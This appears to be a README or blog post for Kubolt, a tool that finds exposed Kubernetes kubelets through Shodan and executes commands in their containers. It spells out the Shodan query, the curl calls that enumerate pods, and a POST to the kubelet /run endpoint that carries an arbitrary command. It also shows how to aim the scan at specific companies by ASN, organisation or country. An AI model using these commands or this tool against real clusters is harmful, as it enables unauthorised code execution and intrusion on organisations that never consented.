Kubolt: scanning public kubernetes clusters
Kubolt is a simple utility for scanning public unauthenticated kubernetes clusters and runs commands inside containers.
Why?
Sometimes, the kubelet port 10250 is open to unauthorized access and makes it possible to run commands inside the containers using a getrun function from kubelet:
How?
The basic query is
ssl:true port:10250 404
Kubelet uses port 10250 with SSL by default, 404 is the HTTP response without URL path.
Kubolt asks Shodan by API for list of IP addresses and keeps them for other OSINT actions 😁
Firstly, let’s ask Kubelet for running pods and filter hosts where the response doesn’t contain Unauthorized and contains container so we can run the command inside it.
curl -k https://IP-from-Shodan:10250/runningpods/
Anyway, if you find the host without any running pods at the time, keep it for next time when pods might be started 😁
You can list all available pods from these requests:
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/
Next kubolt parse the response and generate a new request as below:
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d “cmd=<command-to-run>“
You can target companies more accurate using Shodan filters such as:
- asn
- org
- country
- net
Install
git clone https://github.com/averonesis/kubolt.git
mkdir output
pip install -r requirements.txt
Use
python kubolt.py –query “asn:123123 org:’ACME Corporation'”
#or
python kubolt.py –query “org:’ACME Corporation’ country:UK”
Demo
Source: https://github.com/averonesis/
